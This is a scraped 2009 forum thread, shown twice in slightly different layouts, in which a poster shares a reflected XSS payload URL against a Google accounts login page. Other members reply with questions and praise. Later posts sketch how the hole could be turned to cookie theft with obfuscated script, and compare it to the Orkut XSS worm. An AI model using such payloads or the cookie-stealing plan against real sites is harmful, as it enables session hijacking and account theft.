i hacked GOOGLE!

indiansword

I gave this title just to get more views to it, i have found another XSS vulnerability in google login pages. Have a look at it before it gets fixed, i have pasted the code below, which you will need to run into your address bar and have fun!

Code:

https://www.google.com/accounts/ServiceLoginAuth?service=jotspot&continue=http%3A%2F%2Fsites.google.com%2F%3Fhl%3Dfr&service=jotspot&ul=1&ul=1&sulf=1&UniversalLoginEmail=%22%27%2F%3E%3Cscript%3Ealert(%27Xssed%20by%20Indian%20Sword%27)%3C%2Fscript%3E&uls=Valider

P.S.:- I've already reported it to google, so it'd be fixed soon.

shabbir

What will happen when we paste the above code.

indiansword

lol, r u dbouting me?

i aint gonna steal nothing, if u still dbout then clear your cookies and then check

it will create another MANUAL box in GMAILS main page, as u see it is NOT some PHISHING SH81, because the address starts with "google.com"

shabbir

No. Just wanted to know the output. I know its Google.com domain l0l

SpOonWiZaRd

DUDE!! You are the fu**ing master! how did you come about this? great stuff...

indiansword

glad atleast someone liked it :P

shabbir

Quote:

Originally Posted by indiansword
glad atleast someone liked it :P

Even I liked it but I wanted to even know what would be the output as well. Some repu your way

indiansword

Quote:

Originally Posted by shabbir
Even I liked it but I wanted to even know what would be the output as well. Some repu your way

You're talking about OUTPUT!?

Right now i made another box below the login box just to make you guyz udnerstand. Now, i can just remove that box and make the gmail the way it usually looks, and at the end i can add a script to steal the cookies and that particular script i can use "charcode[]" and hex the script so no one would understand it.

If you remember the XSS worm in orkut albums, ONLY orkut worm stole more than 45,000 ids just in about 5 hours. And this thing is ENTIRE GOOGLE including adsense,orkut,gmail etc. etc.

yea 1 more thing,
this vBulletin reputation system SUCKS!

shabbir

Agreed that Google Accounts could be in trouble but I guess they should have fixed it by now but I still see its not.

SpOonWiZaRd

I see that indiansword likes XSS alot....

indiansword Security Expert
21Apr2009,04:42	#1
	I gave this title just to get more views to it, i have found another XSS vulnerability in google login pages. Have a look at it before it gets fixed, i have pasted the code below, which you will need to run into your address bar and have fun! Code: https://www.google.com/accounts/ServiceLoginAuth?service=jotspot&continue=http%3A%2F%2Fsites.google.com%2F%3Fhl%3Dfr&service=jotspot&ul=1&ul=1&sulf=1&UniversalLoginEmail=%22%27%2F%3E%3Cscript%3Ealert(%27Xssed%20by%20Indian%20Sword%27)%3C%2Fscript%3E&uls=Valider P.S.:- I've already reported it to google, so it'd be fixed soon.

shabbir Go4Expert Founder
21Apr2009,08:23	#2
	What will happen when we paste the above code.

indiansword Security Expert
21Apr2009,09:02	#3
	lol, r u dbouting me? i aint gonna steal nothing, if u still dbout then clear your cookies and then check it will create another MANUAL box in GMAILS main page, as u see it is NOT some PHISHING SH81, because the address starts with "google.com"

shabbir Go4Expert Founder
21Apr2009,09:37	#4
	No. Just wanted to know the output. I know its Google.com domain l0l

SpOonWiZaRd Know what you can do.
22Apr2009,00:12	#5
	DUDE!! You are the fu**ing master! how did you come about this? great stuff...

i hacked GOOGLE!

Already a member?

Not a member yet?

Search Go4Expert

Latest Forum Topics

Find Us On Facebook

Latest Articles

indiansword Security Expert
22Apr2009,00:31	#6
	glad atleast someone liked it :P

shabbir Go4Expert Founder
22Apr2009,08:39	#7
	Quote: Originally Posted by indiansword glad atleast someone liked it :P Even I liked it but I wanted to even know what would be the output as well. Some repu your way

indiansword Security Expert
22Apr2009,23:52	#8
	Quote: Originally Posted by shabbir Even I liked it but I wanted to even know what would be the output as well. Some repu your way You're talking about OUTPUT!? Right now i made another box below the login box just to make you guyz udnerstand. Now, i can just remove that box and make the gmail the way it usually looks, and at the end i can add a script to steal the cookies and that particular script i can use "charcode[]" and hex the script so no one would understand it. If you remember the XSS worm in orkut albums, ONLY orkut worm stole more than 45,000 ids just in about 5 hours. And this thing is ENTIRE GOOGLE including adsense,orkut,gmail etc. etc. yea 1 more thing, this vBulletin reputation system SUCKS! Last edited by indiansword; 23Apr2009 at 00:10..

shabbir Go4Expert Founder
23Apr2009,08:24	#9
	Agreed that Google Accounts could be in trouble but I guess they should have fixed it by now but I still see its not.

SpOonWiZaRd Know what you can do.
23Apr2009,10:49	#10
	I see that indiansword likes XSS alot....

User Name:		Save
Password